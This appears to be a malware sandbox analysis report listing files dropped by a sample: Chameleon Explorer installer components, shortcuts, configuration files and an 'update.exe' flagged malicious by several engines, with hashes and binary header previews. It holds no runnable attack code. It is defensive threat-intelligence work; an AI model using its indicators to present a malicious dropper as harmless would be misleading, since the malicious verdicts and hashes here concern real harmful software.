                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Feb 22 15:08:14 2023, mtime=Wed Feb 22 15:08:14 2023, atime=Sat Dec 24 21:19:16 2016, length=15091304, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1213
                                                                                                                                      Entropy (8bit):4.5920770213446
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8mUmE/DJdOEA+HDqElS1llAiKQdCHqhdCVUUygGs7aB6m:8mUmQDJdOR+jqElSPOiKQdCKhdCWOcB6
                                                                                                                                      MD5:B841A6D3FB67E969D38C533B1705E66E
                                                                                                                                      SHA1:1E182E5D2347A64A3ECB611CD485B3F16DC1F1C2
                                                                                                                                      SHA-256:5745AB86DA0878499B9E68EBC348A760310CEB4DD9F0E8B4D735F3AA9E1E800C
                                                                                                                                      SHA-512:F70F5EFE6581D9AC8B82F3307485F77B49243B8F4E4BA161D933269FB8486B6CEAE8C5BEF5BA776DB6672C9BFC8E99BB9571042D1DC62B1A1E94921EF9C3DB28
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.... ........F...!U..F...JK.3^..hF...........................P.O. .:i.....+00.../C:\.....................1......U...PROGRA~2.........L.VV......................V.....35..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....n.1.....VV....CHAMEL~1..V......VV..VV.......}......................7.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.....x.2.hF...Ih. .CHAMEL~1.EXE..\......VV..VV................................C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.......n...............-.......m....................C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe..N.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.\.C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.).C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.........*................@Z|...K.J.........`.......X.......405464...........!a..%.H.VZAj...;.............-..!a..%.H.VZAj...;.............-..

                                                                                                                                      C:\Users\Public\Desktop\Chameleon Explorer.lnk

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Feb 22 15:08:14 2023, mtime=Wed Feb 22 15:08:14 2023, atime=Sat Dec 24 21:19:16 2016, length=15091304, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1195
                                                                                                                                      Entropy (8bit):4.592811455946389
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8mUmE/K4/dOEA+HDqElS1llAiK3dCHqhdCVUUygGs7aB6m:8mUmQK4/dOR+jqElSPOiK3dCKhdCWOcs
                                                                                                                                      MD5:A491248D4752E4B9749729447568B589
                                                                                                                                      SHA1:E8E0072B50D49082882662B611B73EAFCD241EFD
                                                                                                                                      SHA-256:844A30F18B62217492963D3A84FAF7F135DF587C8DF517A53828B16EE6D7AB62
                                                                                                                                      SHA-512:589A497CC6775C7FDE0B34915D18F1B8D76924392DC707D435F0D028DB366E455E3C04B69AD40F931F68A92D2D3911171BAE1834558D16B6D97819EDA8913193
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.... ........F...!U..F...JK.3^..hF...........................P.O. .:i.....+00.../C:\.....................1.....VV....PROGRA~2.........L.VV......................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....n.1.....VV....CHAMEL~1..V......VV..VV.......}......................7.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.....x.2.hF...Ih. .CHAMEL~1.EXE..\......VV..VV................................C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.......n...............-.......m....................C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe..E.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.\.C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.).C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.........*................@Z|...K.J.........`.......X.......405464...........!a..%.H.VZAj...;.............-..!a..%.H.VZAj...;.............-.............1SPS.X

                                                                                                                                      C:\Users\user\AppData\Local\Temp\autEDA4.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6860752
                                                                                                                                      Entropy (8bit):7.995791234867719
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:196608:ZIwvgsb87DwQiiFFL4an2L/dfXaI+fVcZg:33Stl4LL/ZaIg
                                                                                                                                      MD5:B2E5A8FE3CA4F0CD681B5662F972EA5F
                                                                                                                                      SHA1:B7DBCFAEE55ECBF0158431D85DABDD479AB449C7
                                                                                                                                      SHA-256:E71C48C03B8CFD37BF17E62460733A4BFE9C484E947FD9DB291F65405A2BA9E8
                                                                                                                                      SHA-512:40B7140F5C182CD51CEE142A2575BD70DC9BDE311AD3952119FB9769B5CEEB467695AA5A66FC90520712D9A39458930EFB965496D6443665B7597CFD66247AAF
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W..................................... ....@...................................i...@......@....................................................h. ............................................................................................text...D........................... ..`.itext..d........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.................&...................rdata...............&..............@..@.rsrc................(..............@..@....................................@..@........................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\autF4E9.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):236438
                                                                                                                                      Entropy (8bit):7.953392973061269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:EwmyOUCaZaI4GDXdgOIsNstrbJaNzjD46ElEvmM+0/iHy8xTqYPt/Gh2IoZfd0:EX4lZhDXdtICFNzX46EevZDiSQltaeF0
                                                                                                                                      MD5:F7D02B4274D39BFE8DFB0CAD3370C58C
                                                                                                                                      SHA1:7A04F431DEB26B7CA85EBF984801AE1B0A36E839
                                                                                                                                      SHA-256:7298447DDFE39CDA1F174D586910B1E34B537DD94CE67BF221828E012F338C0C
                                                                                                                                      SHA-512:F1C32F60C056FDF4633FDBE19DE441599255D52D342039194AF5901AB58203F079A83386D118FA597EA61A9B242AA0F10586ABEA102DB8B4A0067B4990A8DB08
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:EA06..1......................Z..F@.~.@.!......'.!.@i...R.i....+}..a..,v.u..t.X...... ...J}NAm..,..l6.$.D.....\.z.H.&...&&...O$:<M.. ..t...J.c... ..]B...S 08..U....k....ap.4....h...J...."............0X...".......9t......\D..<.....I..%../....J` .<.H!.........:...\. ..l..e.].......#...F@.z..X%.K.....C!...... ....C....s.X....H.0.L..2.Q..98?.X....Z.V....%2..............?.................C...|.y..._.~......?..OS....}>...m..~oW.....|.....}...C.O...4.<..O..}t.x....{...........p.....y...~..p.N...F..O.S.4.@..W....K..K..........X...]?.......}>...S........9..~.....3>.|f/.....~l.`.G.t....O.s......O.....w..O.Z~........i......S...V..O.l....h....:......)...B..HG......O...4.D..O.v=t........J...(.y.P"4.......8...T.......8.L.z.... ...&....(.......NP.cx.Qtp*...h..( ...sh....!..."...c@..n.....5D...........U..k...v.....5............PH..4..F... .ed......P.b...W..*...c...`..x......@.....R..j...k.....5........B.........V..2...R..jh..D...........5........s...`......Z....@.....\..jx..x...

                                                                                                                                      C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Roaming\cexplorer.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1185824
                                                                                                                                      Entropy (8bit):6.406882852477582
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
                                                                                                                                      MD5:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                                                      SHA1:0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
                                                                                                                                      SHA-256:B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
                                                                                                                                      SHA-512:49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.................................x[....@......@..............................@8...0.................. .................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\is-V4HOF.tmp\_isetup\_setup64.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6144
                                                                                                                                      Entropy (8bit):4.720366600008286
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\is-V4HOF.tmp\background.bmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PC bitmap, Windows 3.x format, 550 x 400 x 8, resolution 3780 x 3780 px/m, 256 important colors, cbSize 221878, bits offset 1078
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):221878
                                                                                                                                      Entropy (8bit):2.943873456317086
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kAm32YDp95sTuEA8dXMhQp/NeHL/msCc1J1yDusX7W4GqOQlDq3mh9h7EER0V6FP:QzcZbRj
                                                                                                                                      MD5:5C462496481201B9E9D855A30CEBC0CF
                                                                                                                                      SHA1:A0105BF0140DAC14C9ACDB07CB0740D3FD611724
                                                                                                                                      SHA-256:D67EC0D4146B0C030703BDC405ACD2B6EB7E7A302D65B3F339D9D45AFC05AC52
                                                                                                                                      SHA-512:08D4CD904D88FC97E1DFB6AAA83D4CCDF8CF4776D7D16FDE5B067ED81C65E89CA03EA0937532E0AD2E37F19C283C488E9C5EDB05366389F0848F11D1856D42C1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:BM.b......6...(...&.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFE2E75B60B57B96A8.TMP

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Roaming\update.exe
                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16384
                                                                                                                                      Entropy (8bit):2.1030849329474686
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:JKMxnV88nMGcrl9fbjWB4Rvzs1HlMYSfQsQ:JKMxG8MZLWavIbkfQv
                                                                                                                                      MD5:5EBA272FAA8B455AB9510F83C48D9CB2
                                                                                                                                      SHA1:3A61BA4DF62A7A19E57EB1525385762B74859ED4
                                                                                                                                      SHA-256:E38E1B143BA8E3D15C7A10DE9CE7A43FCCBAD76B554772AA56A42853C63C76CE
                                                                                                                                      SHA-512:D3C92682762B2FB93FB94367295AA8E76940EB3A59335837D56697605902F536E18678662A50259AF5CBB697A93D505755F4501F3CF6D7E671DC401CAA8B760D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\cexplorer.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6860752
                                                                                                                                      Entropy (8bit):7.995791234867719
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:196608:ZIwvgsb87DwQiiFFL4an2L/dfXaI+fVcZg:33Stl4LL/ZaIg
                                                                                                                                      MD5:B2E5A8FE3CA4F0CD681B5662F972EA5F
                                                                                                                                      SHA1:B7DBCFAEE55ECBF0158431D85DABDD479AB449C7
                                                                                                                                      SHA-256:E71C48C03B8CFD37BF17E62460733A4BFE9C484E947FD9DB291F65405A2BA9E8
                                                                                                                                      SHA-512:40B7140F5C182CD51CEE142A2575BD70DC9BDE311AD3952119FB9769B5CEEB467695AA5A66FC90520712D9A39458930EFB965496D6443665B7597CFD66247AAF
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W..................................... ....@...................................i...@......@....................................................h. ............................................................................................text...D........................... ..`.itext..d........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.................&...................rdata...............&..............@..@.rsrc................(..............@..@....................................@..@........................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\update.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):602376
                                                                                                                                      Entropy (8bit):7.209153215805898
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:je5aQr1vqfbmjDfqm02hkJcuosc4Z7j0SGScPqrnCu:jkhifKjDmykJc3sr/foGCu
                                                                                                                                      MD5:CF1EDC23E7EB941A4231A322C08C22B4
                                                                                                                                      SHA1:63B1365441FD0B0BBBF1E1DFF4704AE73D836CA2
                                                                                                                                      SHA-256:109591C2907EA03434300B093B5E15D1F742A6CE18FA8D2D658A26BFE424F0B3
                                                                                                                                      SHA-512:C9601F2BF13DB021A80BBE914BD471981EC37A343CABF054FA27A311E7E374DEDAD5907C495B20D2A17C9399F881DAB882BA17D48E0F0BF493BF0DC5124D47B2
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 80%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L......S.....................@......X.............@.......................... .......t......................................$...(.......0)........... ......................................................8... .......(............................text...<........................... ..`.data...............................@....rsrc...0).......0..................@..@..V............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\Documents\Chameleon files\Explorer configuration\colors.ini (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):736
                                                                                                                                      Entropy (8bit):5.19291613287325
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:71WWe2T/GYxe4EfiYP/LpT7TAiE6AufSEnh9mgyzYhG:71//psEkSgrG
                                                                                                                                      MD5:8DD2C4351E4B0D2930D563DA2C6C2A48
                                                                                                                                      SHA1:A1B468692AC3F74F9A2550AEAAFF0D9624513C71
                                                                                                                                      SHA-256:EFCA88B595BB73EFCEBA76EC7563B29AC32C4B5A86217C4BF1FBB68B1FFC0F5C
                                                                                                                                      SHA-512:F9C409B25AA07AD3B4421A841AD9F1139CC2B134F47EF8844D948367B5D30107F7BB5FDB1EC3B15D1CB5460631405784B57046CF8174BF8D05A6ED62847A0C08
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.[0]..Masks=.txt;.doc;.docx;.xls;.xlsx;.pdf;.rtf;.odt;.ods;.chm;.ini;.mobi;.epub;.azw;.djvu;.fb2..Enabled=0..ColorText=5283896..ColorBack=-1....[1]..Masks=.png;.jpg;.jpeg;.gif;.bmp;.tif;.tiff;.psd;.ico..Enabled=0..ColorText=5718738..ColorBack=-1....[2]..Masks=.avi;.mpg;.wmv;.mkv;.mpeg;.flv;.mp4;.vob;.mov;.divx..Enabled=0..ColorText=26316..ColorBack=-1....[3]..Masks=.mp3;.wav;.flac;.ape;.ogg..Enabled=0..ColorText=33023..ColorBack=-1....[4]..Masks=.exe;.bat;.msi;.application;.cmd..Enabled=1..ColorText=6830483..ColorBack=-1....[5]..Masks=.dll;.ocx..Enabled=0..ColorText=15728760..ColorBack=-1....[6]..Masks=.zip;.rar;.7z;.cab;.gz;.tar..Enabled=1..ColorText=13797186..ColorBack=-1....[IntegrityCheckingSignature]..Finish=Success....

                                                                                                                                      C:\Users\user\Documents\Chameleon files\Explorer configuration\colors.ini.temp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):736
                                                                                                                                      Entropy (8bit):5.19291613287325
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:71WWe2T/GYxe4EfiYP/LpT7TAiE6AufSEnh9mgyzYhG:71//psEkSgrG
                                                                                                                                      MD5:8DD2C4351E4B0D2930D563DA2C6C2A48
                                                                                                                                      SHA1:A1B468692AC3F74F9A2550AEAAFF0D9624513C71
                                                                                                                                      SHA-256:EFCA88B595BB73EFCEBA76EC7563B29AC32C4B5A86217C4BF1FBB68B1FFC0F5C
                                                                                                                                      SHA-512:F9C409B25AA07AD3B4421A841AD9F1139CC2B134F47EF8844D948367B5D30107F7BB5FDB1EC3B15D1CB5460631405784B57046CF8174BF8D05A6ED62847A0C08
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.[0]..Masks=.txt;.doc;.docx;.xls;.xlsx;.pdf;.rtf;.odt;.ods;.chm;.ini;.mobi;.epub;.azw;.djvu;.fb2..Enabled=0..ColorText=5283896..ColorBack=-1....[1]..Masks=.png;.jpg;.jpeg;.gif;.bmp;.tif;.tiff;.psd;.ico..Enabled=0..ColorText=5718738..ColorBack=-1....[2]..Masks=.avi;.mpg;.wmv;.mkv;.mpeg;.flv;.mp4;.vob;.mov;.divx..Enabled=0..ColorText=26316..ColorBack=-1....[3]..Masks=.mp3;.wav;.flac;.ape;.ogg..Enabled=0..ColorText=33023..ColorBack=-1....[4]..Masks=.exe;.bat;.msi;.application;.cmd..Enabled=1..ColorText=6830483..ColorBack=-1....[5]..Masks=.dll;.ocx..Enabled=0..ColorText=15728760..ColorBack=-1....[6]..Masks=.zip;.rar;.7z;.cab;.gz;.tar..Enabled=1..ColorText=13797186..ColorBack=-1....[IntegrityCheckingSignature]..Finish=Success....

                                                                                                                                      C:\Users\user\Documents\Chameleon files\Explorer configuration\filters.ini (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):793
                                                                                                                                      Entropy (8bit):5.017107027448105
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4aoIJ8i3quu5IJ0x9KIuuPI5VuujpI6Tp0iuuHG:4aoIK6q1IJ0OITI7vpIqjG
                                                                                                                                      MD5:D0E6E59B4C0A90FF05AEAEA3B850E780
                                                                                                                                      SHA1:1E975637110EF7EEE57C739E5B208D624F2D44C4
                                                                                                                                      SHA-256:99428152166486929659D14D11FB12822E2DC5EFF9FA43706C35407A45FCA898
                                                                                                                                      SHA-512:62522B9BA3557BDE691945EEED75C05C53146D05E9632D6EF5BFAE083FCF52F885277398E4E9853432C2E1366ACBC5FA8E73BA08584AD36C52C70F00869CC0CD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.[Settings]..MaxFilterIndex=4....[3]..Name=Images..IncludeFilter=*.jpg;*.jpeg;*.png;*.tiff;*.gif;*.bmp;*.webp;*.psd;*.svg;*.psp;*.tga;*.ai;*.cdr..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[4]..Name=Documents..IncludeFilter=*.doc;*.docx;*.txt;*.rtf;*.xls;*xlsx;*.odt;*.ods;*.pdf;*.djvu;*.mobi;*.epub;*.fb2;*.ppt;*.pptx..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[2]..Name=Audio..IncludeFilter=*.mp3;*.wav;*.flac;*.ape;*.3gp;*.amr;*.m4a;*.m4p;*.ogg;*.oga;*.ra;*.rm;*.wv;*.wma..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[1]..Name=Video..IncludeFilter=*.avi;*.mkv;*.mp4;*.mov;*.wmv;*.flv;*.divx;*.ts;*.mpeg;*.vob;*.3gp;*.webm;*.flv;*.mpg;*.mp4..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[IntegrityCheckingSignature]..Finish=Success....

                                                                                                                                      C:\Users\user\Documents\Chameleon files\Explorer configuration\filters.ini.temp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):793
                                                                                                                                      Entropy (8bit):5.017107027448105
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4aoIJ8i3quu5IJ0x9KIuuPI5VuujpI6Tp0iuuHG:4aoIK6q1IJ0OITI7vpIqjG
                                                                                                                                      MD5:D0E6E59B4C0A90FF05AEAEA3B850E780
                                                                                                                                      SHA1:1E975637110EF7EEE57C739E5B208D624F2D44C4
                                                                                                                                      SHA-256:99428152166486929659D14D11FB12822E2DC5EFF9FA43706C35407A45FCA898
                                                                                                                                      SHA-512:62522B9BA3557BDE691945EEED75C05C53146D05E9632D6EF5BFAE083FCF52F885277398E4E9853432C2E1366ACBC5FA8E73BA08584AD36C52C70F00869CC0CD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.[Settings]..MaxFilterIndex=4....[3]..Name=Images..IncludeFilter=*.jpg;*.jpeg;*.png;*.tiff;*.gif;*.bmp;*.webp;*.psd;*.svg;*.psp;*.tga;*.ai;*.cdr..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[4]..Name=Documents..IncludeFilter=*.doc;*.docx;*.txt;*.rtf;*.xls;*xlsx;*.odt;*.ods;*.pdf;*.djvu;*.mobi;*.epub;*.fb2;*.ppt;*.pptx..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[2]..Name=Audio..IncludeFilter=*.mp3;*.wav;*.flac;*.ape;*.3gp;*.amr;*.m4a;*.m4p;*.ogg;*.oga;*.ra;*.rm;*.wv;*.wma..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[1]..Name=Video..IncludeFilter=*.avi;*.mkv;*.mp4;*.mov;*.wmv;*.flv;*.divx;*.ts;*.mpeg;*.vob;*.3gp;*.webm;*.flv;*.mpg;*.mp4..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[IntegrityCheckingSignature]..Finish=Success....

                                                                                                                                      C:\Users\user\Documents\Chameleon files\Folder configuration\favorites.ini (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1029
                                                                                                                                      Entropy (8bit):5.073046635157514
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ilPKE3YE39E3IE3ZE3nVmxE3vxE36TpE3laNE3RE3zE3ZjxE3Fg9lKE34G:eSFIt4kVciz+aNoeABMjG
                                                                                                                                      MD5:F5561BEACF73E8F22AE653BCB64E2E75
                                                                                                                                      SHA1:7E2040EA37E77A593B16F66131958C9BC39B14F5
                                                                                                                                      SHA-256:DD3B1B6E081034B6EA7B43FA7BCD2E008F7228A89014ECF8465863ADB8C04CD3
                                                                                                                                      SHA-512:96F65778464684030AA2A31422EE7A5CC4683C6C975DB600C4CFEBD5B9ED8CC1B9213F07A2B3EBBDB73868C44CCE027999C6CC6B61AFD30864434E741D38EF4F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.[0]..Path=C:\Users\user\Desktop..Caption=Desktop..ItemType=0..GroupIndex=0....[1]..Path=C:\Users\user\Downloads..Caption=Downloads..ItemType=0..GroupIndex=0....[2]..Path=C:\Users\user\Documents..Caption=Documents..ItemType=0..GroupIndex=0....[3]..Path=C:\Users\user\Pictures..Caption=Pictures..ItemType=0..GroupIndex=0....[4]..Path=C:\Users\user\Music..Caption=Music..ItemType=0..GroupIndex=0....[5]..Path=C:\Users\user\Videos..Caption=Videos..ItemType=0..GroupIndex=0....[6]..Path=Libraries..Caption=Libraries..ItemType=0..GroupIndex=0....[7]..Path=Recycle Bin..Caption=Recycle Bin..ItemType=0..GroupIndex=0....[8]..Path=..Caption=This PC..ItemType=0..GroupIndex=0....[9]..Path=C:..Caption=Local Disk (C:)..ItemType=0..GroupIndex=0....[10]..Path=D:..Caption=DVD Drive (D:)..ItemType=0..GroupIndex=0....[11]..Path=c:\windows\notepad.exe..Caption=Notepad..ItemType=0..GroupIndex=0....[12]..Path=c:\windows\System32\calc.exe..Caption=Calculator..ItemType=0..GroupIndex=0....[IntegrityCheckingS

                                                                                                                                      C:\Users\user\Documents\Chameleon files\Folder configuration\favorites.ini.prev (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1029
                                                                                                                                      Entropy (8bit):5.073046635157514
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ilPKE3YE39E3IE3ZE3nVmxE3vxE36TpE3laNE3RE3zE3ZjxE3Fg9lKE34G:eSFIt4kVciz+aNoeABMjG
                                                                                                                                      MD5:F5561BEACF73E8F22AE653BCB64E2E75
                                                                                                                                      SHA1:7E2040EA37E77A593B16F66131958C9BC39B14F5
                                                                                                                                      SHA-256:DD3B1B6E081034B6EA7B43FA7BCD2E008F7228A89014ECF8465863ADB8C04CD3
                                                                                                                                      SHA-512:96F65778464684030AA2A31422EE7A5CC4683C6C975DB600C4CFEBD5B9ED8CC1B9213F07A2B3EBBDB73868C44CCE027999C6CC6B61AFD30864434E741D38EF4F
